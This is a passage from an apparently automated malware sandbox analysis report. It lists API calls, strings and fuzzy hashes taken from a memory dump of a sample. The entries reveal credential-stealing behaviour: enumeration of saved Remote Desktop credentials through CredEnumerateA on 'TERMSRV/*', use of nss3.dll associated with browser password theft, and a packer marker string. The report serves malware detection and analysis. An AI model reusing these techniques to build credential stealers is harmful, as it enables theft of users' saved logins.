                  • Instruction ID: be40241b7161955c20726612fc7c341daec3493e026f11a1c8ecc6ebd3bd8b9d
                  • Opcode Fuzzy Hash: 3bd0028bd82ac8d0a8d851e1d04e875ce27c06409241a217d3b9dc50780aeffa
                  • Instruction Fuzzy Hash: D7012131D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBE9E949B58
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: http://$https://
                  • API String ID: 0-1916535328
                  • Opcode ID: 3d71c500a3d52b6c1441a28b08993b9dff3abac0df888200a45433a7d3fca379
                  • Instruction ID: e74c1b2a948100d7a20d9e42ebddfc060ab39c2c859d7100c87d751417799821
                  • Opcode Fuzzy Hash: 3d71c500a3d52b6c1441a28b08993b9dff3abac0df888200a45433a7d3fca379
                  • Instruction Fuzzy Hash: 87411931800109FADF12AF91DE05BEE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                  APIs
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  • StrStrIA.SHLWAPI(?,00416799), ref: 0040CC68
                  • lstrlen.KERNEL32(TERMSRV/,?,00416799), ref: 0040CC76
                  • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00416799), ref: 0040CC86
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID: TERMSRV/
                  • API String ID: 1659193697-3001602198
                  • Opcode ID: 84e16c946d975c6994fc352a951dbbef6030e1c0c429251910d6422501b2576f
                  • Instruction ID: 68f82cc74d5732e4df8834f790b63f09b103c0f51cb433b5b3d7af799168e2e2
                  • Opcode Fuzzy Hash: 84e16c946d975c6994fc352a951dbbef6030e1c0c429251910d6422501b2576f
                  • Instruction Fuzzy Hash: 3B11E831410109FFCF026F61CC428DD3EB2AF44398F10452AB929791F1D77A8AB1AB88
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 00401800
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GlobalUnWire.KERNEL32(?), ref: 0040185E
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: GlobalLocal$AllocFreeWire
                  • String ID: PKDFILE0YUICRYPTED0YUI1.0
                  • API String ID: 3297799765-258907703
                  • Opcode ID: 6330d0fdcfb704d36495aecea66acedf5a78f0c7817a92b223f54b90618a218a
                  • Instruction ID: 242ffcd3590a634520bc911c351e46a2d3a0c6a5358af9120b3fa39d358ca222
                  • Opcode Fuzzy Hash: 6330d0fdcfb704d36495aecea66acedf5a78f0c7817a92b223f54b90618a218a
                  • Instruction Fuzzy Hash: A921EC72D00109BBEF017FE1DC42AAD7E76EF10344F10807ABA10751B1E77A8A609B98
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00409074
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: CurrentDirectorylstrlen
                  • String ID: nss3.dll
                  • API String ID: 2713697268-2492180550
                  • Opcode ID: 9303ff7b80a937c2c754f6be0409136252a2ab3fc9a458800c4bab097c034e15
                  • Instruction ID: fafa4c9f2cd23987641e552e7df34fc844c72cf86d1cbb3ef9db78e87a86cd5c
                  • Opcode Fuzzy Hash: 9303ff7b80a937c2c754f6be0409136252a2ab3fc9a458800c4bab097c034e15
                  • Instruction Fuzzy Hash: 18118E70A40101EBDB106F25EC4E7C93FA1FB88304F00843AF015A42E6D7F98DA68A0D
                  APIs
                  • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                  • CredFree.ADVAPI32(00000000), ref: 0040CD60
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: Cred$EnumerateFree
                  • String ID: TERMSRV/*
                  • API String ID: 3403564193-275249402
                  • Opcode ID: 07f63fe400d4a5bc404cf42aa4128ec2a5b8c441f98532edb148a727f2375307
                  • Instruction ID: 4f6d88ad46612d9a6f3f2a6ecf9550f7317fb44355aabb19cf27236a77551134
                  • Opcode Fuzzy Hash: 07f63fe400d4a5bc404cf42aa4128ec2a5b8c441f98532edb148a727f2375307
                  • Instruction Fuzzy Hash: 9B113531800208EBDF319F94C988BDABBB4EF05709F14827BA501721E0D379AE85DB8D